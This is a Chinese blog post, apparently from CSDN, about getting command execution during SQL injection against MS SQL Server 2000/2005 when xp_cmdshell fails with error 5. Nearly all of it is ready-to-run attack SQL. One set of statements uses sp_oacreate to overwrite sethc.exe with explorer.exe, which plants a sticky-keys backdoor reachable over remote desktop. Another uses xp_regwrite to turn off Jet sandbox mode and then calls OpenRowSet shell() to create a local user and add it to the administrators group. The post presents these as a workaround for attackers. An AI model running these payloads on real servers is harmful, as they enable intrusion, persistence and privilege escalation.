mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法

最新推荐文章于 2021-03-20 18:09:07 发布
最新推荐文章于 2021-03-20 18:09:07 发布
阅读量6.4k 收藏 1
点赞数 1
分类专栏: SQL 技术 文章标签: xp database windows shell null oo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/6361234
版权

mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。

    微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。

    原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:

1、替换shift文件(在开启3389情况下):

    下面两条语句为分别执行的。

    这条语句将explorer.exe复制为sethc.exe

    declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe','c:/windows/system32/sethc.exe';

    这条语句将sethc.exe复制到dllcache目录下

    declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:/windows/system32/sethc.exe','c:/windows/system32/dllcache/sethc.exe';

    另外这两条语句使用到的sp_oacreate存储过程需要使用到odsole70.dll这个文件,所以这个文件的存亡,关系到创建的成功与否。

2、直接开启acess的沙盘(沙盒),来执行命令:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators 123 /add")');

注意:如果是 Windows 2000,则将以上 Windows 目录改成 winnt。

Yatere
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL Server阻止了对组件xp_cmdshell过程的解决方案.docx
06-23
SQL Server阻止了对组件xp_cmdshell过程的解决方案。 错误描述:SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。有关启用‘xp_cmdshell’的详细信息,请参阅sQL帮助文件。
cmd窗口调用.rar
04-04
标题“cmd窗口调用.rar”和描述中提到的“cmd窗口调用”指的是在Windows操作系统中使用命令提示符(Command Prompt)执行系统命令的技术。在IT领域,掌握CMD窗口调用是进行系统管理、自动化任务和程序开发的基础技能...
SQL SERVER 2008 执行xp_cmdshell的过程中出错,调用createprocess失败,错误代码 5 解决方案
热门推荐
u012949335的专栏
03-20 1万+
1、进入 控制面板----管理工具------本地安全策略 点击 本地策略--------安全选项 把“网络安全:LAN管理器身份验证级别”双击打开,选择“发送LM和NTLM响应”(原来是“没有定义”)。确认后,重新启动服务器,该问题即能解决。 ...
执行xp_cmdshell时发生错误--xpsql.cpp: 错误 5 来自 CreateProcess
09-25 4973
错误代码:xpsql.cpp: 错误 5 来自 CreateProcess 错误原因分析:xp_cmdshell没有执行CMD的权限。 解决方法:给CMD添加system的执行权限。
SQL Server 无法将“WIN-C6BGU7K6VUR”配置为分发服务器
Auspicious航的博客
03-05 1820
1、SQL Server2008数据库在进行开启复制分发的配置时,出现了报错: 正在配置... - 正在配置分发服务器 (错误) 消息 SQL Server 无法将“WIN-C6BGU7K6VUR”配置为分发服务器。 (Microsoft.SqlServer.ConnectionInfo) ------------------------------ 其他信息: 执行 Tr...
pipe-CMD.rar_CMD回显_CreateProcess_c++ cmd pipe_windows管道cmd_管道 c
07-15
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
abc.rar_ABC_BOOL CreateProcess_CreateProcess
09-24
通过函数 BOOL CreateProcess(LPCTSTR lpApplicationName,LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD ...
dll_charu.rar_CreateProcess_createprocess dll_creatprocess的dll
09-23
《DLL注入:深入理解CreateProcess与DLL的动态加载》 在Windows操作系统中,程序的执行并不总是静态的。有时候,我们需要在程序运行时动态地加载和执行其他代码,这就是DLL(Dynamic Link Library)注入的基本思想...
Qt编译过程出现错误process_begin: CreateProcess(NULL, rm -f debug/moc_predefs.h, …) failed的解决办法
01-07
目前尚未解决,先记录一下。有知道的朋友不妨留言告知,谢谢。 Makefile.Debug:168: recipe for target 'compiler_moc_predefs_clean' failed process_begin: CreateProcess(NULL, rm -f debug/moc_predefs.h, ...) ...
1433修复命令大全 提权错误修复.txt
03-13
1433修复命令大全 提权错误修复.txt
erweima.zip_delphi 二维码_调用EXE
09-23
本主题涉及的是在Delphi项目中实现二维码生成与处理,并调用外部执行文件的功能。下面将详细阐述这些知识点。 首先,让我们讨论二维码。二维码(Quick Response Code)是一种二维条形码,能够存储比传统条形码更多...
CMD_CALL_CMD匿名管道封装_
09-29
在"CMD_CALL_CMD匿名管道封装_"项目中,`myCMD_CALL.c`文件很可能是主要的实现代码,它将包含定义管道、启动CMD进程、发送命令、读取响应和关闭管道的函数。下面我们将详细探讨CMD匿名管道封装的关键步骤和相关知识...
EXE-Call.rar_DELPHI调用CALL_call_exe_exe 导出函数_exe调用exe
09-19
在编程领域,有时候我们需要在不同的程序之间进行交互,比如一个EXE文件调用另一个EXE文件的函数。这里,我们探讨的主题是“EXE-Call”,即如何在Delphi程序中使用CALL指令来调用其他可执行文件(EXE)中的导出函数...
calling-program.zip_调用EXE_调用exe程序
09-20
在IT行业中,程序之间的相互调用是常见的操作,特别是在软件工程和系统集成中。本案例中的"calling-program.zip"是一个包含示例代码和可执行文件的压缩包,它专门展示了如何编写一个程序来调用其他的exe文件。让我们...
SQL Server 2012 xp_cmdshell不能执行的解决办法
学习是一种习惯
07-10 7751
        一个很早的系统,数据库一直跑的好好的,但在最近就无法执行压缩备份文件了,以至于1TB的硬盘很快就撑爆了。查了很久也没有找到原因,按照网上的很多方法都试了一遍,结果都不行。        这里要说一下啊,2008版本以后的sql server与之前版本的有很大的不同,就“外围应用“来讲,低版本中都是在操作系统的应用里可以看到的单独的应用,到了高版本后它变成了数据库实例的右键菜单里的一...
在执行xp_cmdshell的过程中出错,调用'LogonUserW'失败,错误代码:'1909'
weixin_33856370的博客
10-23 825
     在上篇文章Could not obtain information about Windows NT group/user 'xxxx\xxxx', error code 0x5里面,我介绍了SQL Server服务启动账号域账号锁定的情况下,有些Job Owner为域账号的作业执行会报错,其实在域账号被锁定的情况下(该域账号是SQL Server服务的启动账号),执行xp_cmdshe...
EXEC开启xp_cmdshell存储过程
weixin_38168918的博客
07-25 165
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1; EXEC sp_configure 'show advanced options', 0; RECONFIGURE; 转载于:https://www.cnblogs.c...
设置sql 中 xp_cmdshell 可执行
weixin_34082789的博客
10-30 221
2019独角兽企业重金招聘Python工程师标准>>> ...
process_begin: createprocess(n
最新发布
06-28
### 回答1: 这是一个出现在编译器或者命令行窗口的错误信息,提示程序创建一个进程(create process)出现了问题(process begin),可能是由于输入的命令或者参数出现了错误。具体问题需要根据错误信息及其上下文进行分析和排查。 ### 回答2: 我很抱歉,但是您给出的信息不够详细,我不能够理解您想询问的是什么问题。在编程语言中,"process_begin: createprocess(n"是一种错误提示,通常出现在编译过程中,它意味着正在创建一个进程,但是创建过程出现了错误。通常,此错误可能是由于以下原因引起的: 1)命令行参数格式不正确。您可能未正确指定程序的路径或所需的参数。 2)进程正在运行,但由于某种原因导致了错误,比如权限问题,输入输出问题或者程序错误。 3)您正在尝试运行不存在的程序。 为了解决这个问题,您可以尝试以下几种方法。 首先,您需要查看编译器或者开发环境的错误日志,以获取更详细的错误信息,这将有助于您找到问题的根源。 其次,您可以检查程序的路径,确保程序文件存在,并检查所需的参数是否正确。 第三,您可以查看您的系统日志,以了解是什么导致了错误,比如权限问题或者输入输出问题。 最后,您可以尝试重新编译程序,并确保在进行编译时使用了正确的选项,以减少错误的可能性。 总之,由于"process_begin: createprocess(n"的原因可能有很多,如果您希望得到更详细的帮助,请提供更多的信息,以便我能够帮助您找到问题的根源,并提供解决方案。 ### 回答3: Process_begin: createprocess(n. 这个错误常常出现在编程的过程中,通常与程序的编译有关,也可能与程序运行过程中的某些因素有关。这个错误会提示你编译或运行程序的过程中出现了错误,让程序无法执行完成。为了解决这个问题,我们需要了解一些可能导致该问题出现的原因,以便我们能够采取相应的措施,解决该问题。 可能导致该问题出现的原因: 1. 编辑器或编译器中路径未正确配置:如果没有正确地设置路径,就会出现该问题。 2. 电脑中的病毒或恶意软件:如果病毒或恶意软件感染了您的计算机系统,也可能导致该问题的出现。 3. 程序编写错误:如果程序编写出现了错误,也可能导致该问题的出现。 4. 输入输出问题:如果程序的输入输出存在问题,也可能导致该问题的出现。 如何解决该问题: 1. 首先,我们需要检查路径是否正确,在编译器或编辑器中进行设置,确保路径正确无误。 2. 如果计算机系统感染了病毒或其他恶意软件,请运行防病毒软件或修复的软件,确保计算机系统中没有病毒。 3. 检查程序代码,查看是否存在编写错误并进行修改。 4. 检查程序的输入输出,确保没有问题。 结论: Process_begin: createprocess(n)错误通常与程序编译或运行有关,可能由于路径设置不正确,计算机系统感染病毒或其他恶意软件,程序编写错误,或者输入输出的问题导致。如果遇到该问题,我们需要检查并解决这些因素。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值